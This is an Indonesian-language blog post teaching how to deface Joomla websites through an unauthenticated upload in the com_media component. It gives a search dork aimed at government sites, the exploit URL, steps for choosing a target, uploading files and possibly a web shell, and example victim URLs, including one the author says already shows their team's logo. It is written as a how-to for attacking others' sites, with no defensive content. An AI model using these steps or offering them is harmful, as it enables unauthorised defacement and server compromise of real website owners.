Teknik Exploit Joomla

Berhubung udah banyak banget yang share, jadi saya juga ga mau ketinggalan,, hehehe Nah, topic kali ini membahas mengenai Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Media di CMS Joomla.. :) pada penasaran gimana caranya? so easy kok :) Dork : inurl:com_media site:gov exploit : /index.php? option=com_media&view=images&tmpl=component& fieldid=&e_name=jform_articletext&asset=com_content &author=&folder= Step By Step : - pertama , anda cari dulu site target dengan menggunakan dork diatas :D - kedua , anda pilih salah satu site target yang mau di deface :) contoh : http://www.ner.cap.gov/se/index.php? option=com_media&view=imagesList&tmpl= component&folder=&asset=com_content&author= - ketiga , anda masukan exploit yang ada diatas contoh : http://www.ner.cap.gov/se/index.php? option=com_media&view=images&tmpl=component& fieldid=&e_name=jform_articletext&asset=com_content &author=&folder= - keempat , upload deh ... berextensi : txt , png , jpg , klo anda beruntung bisa anda upload shell klik browse , pilih gambar yg kamu mau dan klik start upload - lanjut , tunggu hingga upload selesai .. jika sudah selesai akan muncul tulisan Upload Complete: /namafile.png - nah , untuk melihat file yang sudah kita upload tadi caranya seperti ini http://site-target.com/images/namafile.png contoh : http://www.directoryofbusinesses.co.za/images/sa.png - nah itu udah eheh , itu adalah lambang team saya :D *tidak semua website bisa di deface dengan tehnik ini sekian dulu artikel dari saya ehehe :D